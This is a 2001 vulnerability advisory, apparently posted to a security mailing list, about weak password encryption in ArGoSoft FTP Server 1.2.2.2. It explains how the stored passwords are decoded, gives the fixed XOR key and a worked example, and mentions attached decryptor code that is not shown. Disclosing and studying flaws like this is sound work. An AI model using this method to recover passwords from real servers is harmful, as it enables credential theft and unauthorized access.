ArGoSoft FTP Server 1.2.2.2 Weak password encryption AFFECTED SYSTEMS ArGoSoft FTP Server 1.2.2.2 DESCRIPTION ArGoSoft FTP Server 1.2.2.2 for win32 is vulnerable to decryption of the password file. As a matter of fact the programmers are aware of this since they have implemented decryption algorithms within the FTP Server program itself, as we can find the decrypted passwords when watching the program's memory dumps, or using system debuggers or special tools to peek at the password (User Properties) which is hidden with **** (normally one would expect this to contain something like "-=encrypted=-" so that it can only be changed, but in this case it contains the plaintext password) This simple observation brings up the fact that the passwordfile uses a weak password encryption algorithm, and that the passwords can be obtained from the ciphertext data. So, I started studying this program so that I found the following decryption algorithm : We have the password in ciphertext : NkouCREIJVU= 1) we lookup the individual ciphertext characters in the table 'A'-'Z', 'a'-'z', '0'-'9', '+', '/' and take the indices ranging from 0 -> 63 (these represent 6 bits) 4 of these characters make up 3 binary bytes (4*6 bits = 3*8 bits) 2) we XOR the resulting binary limb with : "T3ZlciB0aGUgaGlsbHMgYW5kIGZhciBhd2F5LCBUZWxldHViYmllcyBjb21lIHRvIHBsYXk=" (we XOR the first byte of our decoded stuff with "T", the second with "3", etc...) If we finish these two passes we get : NkouCREIJVU= -> byterage I've attached source code that decrypts ciphertext passwords : you can give them as the first parameter to the executable, or you can also give it the filename of an ArGoSoft FTP password file, so that it gives you the passwords of all users. IMPACT When combining this with that *.lnk upload bug I pointed out earlier, any user with write access can not only traverse directories but also obtain the passwords of all users. VENDOR STATUS I have sent my findings to supportat_private but since they use the decryption algorithms within the FTP Server program themselves, they are aware of the fact that the password encryption is reversible. Hopefully they will review the encryption algorithm in a next release. ==================================================== [ByteRage] byterageat_private [www.byterage.cjb.net] ==================================================== __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/
This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 21:29:18 PDT